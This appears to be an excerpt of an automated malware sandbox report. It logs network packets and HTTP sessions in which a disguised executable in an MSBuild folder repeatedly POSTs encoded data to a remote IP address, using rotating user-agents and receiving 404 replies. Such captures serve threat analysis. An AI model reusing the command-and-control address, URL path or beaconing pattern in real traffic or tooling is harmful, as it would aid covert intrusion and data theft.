                                      Jan 3, 2025 18:33:00.604026079 CET4978080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:00.608747959 CET8049780206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:00.952790976 CET4978080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:00.957600117 CET8049780206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:01.233242035 CET8049780206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:01.280651093 CET4978080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:01.479165077 CET4978080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:08.109410048 CET4982780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:08.114309072 CET8049827206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:08.114427090 CET4982780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:08.114742041 CET4982780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:08.119658947 CET8049827206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:08.468377113 CET4982780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:08.474024057 CET8049827206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:08.718519926 CET8049827206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:08.764961958 CET4982780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:09.034749985 CET4982780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:14.901248932 CET4986880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:14.906119108 CET8049868206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:14.906208038 CET4986880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:14.906615973 CET4986880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:14.911483049 CET8049868206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:15.265352011 CET4986880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:15.432396889 CET8049868206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:15.516916990 CET8049868206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:15.561834097 CET4986880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:15.745745897 CET4986880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:21.468452930 CET4990780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:21.473325968 CET8049907206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:21.477237940 CET4990780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:21.477498055 CET4990780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:21.482249022 CET8049907206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:21.827806950 CET4990780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:21.832629919 CET8049907206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:22.107248068 CET8049907206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:22.155558109 CET4990780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:22.325977087 CET4990780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:28.019690037 CET4994580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:28.024595976 CET8049945206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:28.024677038 CET4994580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:28.024909019 CET4994580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:28.029692888 CET8049945206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:28.376456022 CET4994580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:28.381298065 CET8049945206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:28.662826061 CET8049945206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:28.718019962 CET4994580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:28.791924953 CET4994580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:38.349484921 CET5001080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:38.354306936 CET8050010206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:38.354428053 CET5001080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:38.354664087 CET5001080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:38.359411001 CET8050010206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:38.702672005 CET5001080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:38.707441092 CET8050010206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:38.977977037 CET8050010206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:39.030477047 CET5001080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:39.081309080 CET5001080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:44.525280952 CET5001580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:44.530194998 CET8050015206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:44.531183958 CET5001580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:44.531418085 CET5001580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:44.536209106 CET8050015206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:44.890126944 CET5001580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:44.898881912 CET8050015206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:45.163882971 CET8050015206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:45.218167067 CET5001580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:45.247010946 CET5001580192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:55.125971079 CET5001680192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:55.131933928 CET8050016206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:55.132035017 CET5001680192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:55.132246017 CET5001680192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:55.138088942 CET8050016206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:55.483731985 CET5001680192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:55.488594055 CET8050016206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:55.746716022 CET8050016206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:55.796071053 CET5001680192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:55.822091103 CET5001680192.168.2.4206.188.197.24

                                      HTTP Request Dependency Graph

                                      • 206.188.197.24

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730206.188.197.24807652C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:04.541862011 CET355OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:04.891035080 CET344OUTData Raw: 05 00 01 02 06 00 01 03 05 06 02 01 02 0d 01 04 00 0a 05 08 02 03 03 0a 07 06 0d 01 06 0f 03 02 0a 02 06 5b 07 05 07 03 0c 00 04 53 05 56 04 56 04 51 0b 01 0d 53 04 05 07 04 06 00 04 52 06 00 02 57 0f 59 07 00 07 01 0e 02 0c 54 0d 01 0d 09 07 51
                                      Data Ascii: [SVVQSRWYTQQP\L~h`zNcrn^vwQ~f^wt|]lxo{Y~|mhtt~_~V@{C\A~Ly
                                      Jan 3, 2025 18:32:05.165966988 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449737206.188.197.24807952C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:16.130064964 CET390OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:16.484189034 CET344OUTData Raw: 00 05 04 03 06 09 01 07 05 06 02 01 02 03 01 0a 00 00 05 08 02 02 03 0e 02 05 0f 02 07 06 02 07 0a 02 06 5d 00 01 07 52 0b 02 04 07 07 05 02 04 05 05 0f 09 0d 57 04 02 01 00 04 04 04 02 05 0e 03 07 0e 0e 05 03 04 04 0c 00 0b 06 0d 50 0e 05 05 06
                                      Data Ascii: ]RWP[WSV\L~N|pPM`\z]u[h|o~^vo`LhcQXxlclvK~hAvwx}O~V@zmzA~\i
                                      Jan 3, 2025 18:32:16.733911991 CET728INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:16 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449738206.188.197.24802284C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:22.846575022 CET355OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:23.203473091 CET344OUTData Raw: 05 00 04 07 03 0a 04 01 05 06 02 01 02 07 01 06 00 03 05 0b 02 01 03 01 00 52 0a 02 04 04 01 52 0d 54 07 0a 01 07 04 04 0e 51 07 00 00 07 05 05 03 03 0c 5b 0e 00 06 0a 05 01 05 0c 06 56 05 0f 00 0a 0d 5b 05 01 06 02 0d 06 0e 50 0d 04 0c 05 05 51
                                      Data Ascii: RRTQ[V[PQU]\L~N^vtbrYuukSUz]clkYptIoolYxNrkTkSwgU\}u~V@A{mvL~b[
                                      Jan 3, 2025 18:32:23.469327927 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:23 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449739206.188.197.24805796C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:29.449120998 CET355OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:29.796830893 CET344OUTData Raw: 05 01 04 0d 03 0d 04 05 05 06 02 01 02 03 01 05 00 0b 05 09 02 04 03 0e 00 0f 0f 02 04 54 00 00 0e 04 06 0e 00 57 07 05 0c 54 04 02 05 04 04 03 05 0a 0d 09 0f 01 06 00 05 0f 06 54 07 0a 07 58 02 04 0e 0a 04 0e 04 08 0c 05 0f 05 0d 54 0b 04 06 04
                                      Data Ascii: TWTTXT[Q\L}P^Xcrj_uhkUj\`BZBp`IxUo^zkStYp}u~V@{SPN}ri
                                      Jan 3, 2025 18:32:30.071332932 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:29 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449740206.188.197.24807352C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:36.103775024 CET408OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                      Host: 206.188.197.24
                                      Content-Length: 336
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:36.452882051 CET336OUTData Raw: 00 01 01 00 03 08 04 07 05 06 02 01 02 05 01 07 00 0a 05 0b 02 03 03 0e 03 0f 0f 50 06 53 01 55 0d 02 04 0c 03 00 04 01 0d 03 07 05 07 01 04 00 07 02 0f 59 0e 05 05 0a 04 57 05 05 04 56 07 08 01 00 0a 0e 05 03 05 00 0c 50 0d 06 0d 0d 0e 01 05 50
                                      Data Ascii: PSUYWVPPPRT\L}U|Ny_c[iu[|@~|[clo_Zlog{se^hSpCtg^N~e~V@zmz~_y
                                      Jan 3, 2025 18:32:36.712089062 CET728INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:36 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449741206.188.197.24807600C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:46.817472935 CET343OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:47.171789885 CET344OUTData Raw: 00 05 01 02 06 0f 01 01 05 06 02 01 02 07 01 02 00 0b 05 0f 02 0d 03 0c 00 03 0d 54 05 06 06 08 0f 56 06 5c 02 57 04 0a 0f 01 07 0a 06 01 05 01 07 02 0e 0b 0f 07 04 57 04 0e 06 57 06 04 07 5f 01 04 0d 00 07 06 04 02 0f 04 0c 57 0c 01 0c 02 05 53
                                      Data Ascii: TV\WWW_WSQV\L}P|`rwb~Xa\`huLvl`MMh{BUJz`Th}^cdk_}_~V@AxmPba
                                      Jan 3, 2025 18:32:47.421807051 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:47 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449743206.188.197.24803384C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:32:54.003305912 CET343OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:54.359172106 CET344OUTData Raw: 05 01 04 01 06 0c 01 0b 05 06 02 01 02 07 01 01 00 05 05 0a 02 0c 03 0a 02 0e 0d 01 04 07 03 57 0f 52 06 0b 02 06 05 02 0f 0a 07 01 05 06 06 07 05 05 0b 01 0a 02 06 55 01 0e 05 54 05 0b 05 01 01 06 0c 0e 04 05 05 03 0e 00 0f 07 0e 54 0b 04 07 04
                                      Data Ascii: WRUTTUR\L~NXcqmOvft|f_wUthZlJyll^{~hnsU`YRA}_~V@AxSnOry
                                      Jan 3, 2025 18:32:54.635205984 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:54 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449780206.188.197.24807780C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 18:33:00.604026079 CET343OUTPOST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:33:00.952790976 CET344OUTData Raw: 00 0b 04 06 03 0b 04 00 05 06 02 01 02 01 01 00 00 06 05 0d 02 01 03 01 02 0e 0c 0d 04 04 01 04 0a 0e 07 00 07 02 07 00 0c 03 04 53 00 0b 06 04 03 0a 0c 5b 0d 0f 06 57 07 01 06 51 05 00 06 0e 00 06 0c 01 06 05 04 52 0e 03 0f 0e 0f 0c 0c 54 06 06
                                      Data Ascii: S[WQRTT\L~@|pj`bSMb[h@|lScoc\]kXyg{s}^CwRwtc]ju~V@xCb~b[
                                      Jan 3, 2025 18:33:01.233242035 CET326INHTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:33:01 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449827206.188.197.24808004C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      TimestampBytes transferredDirectionData
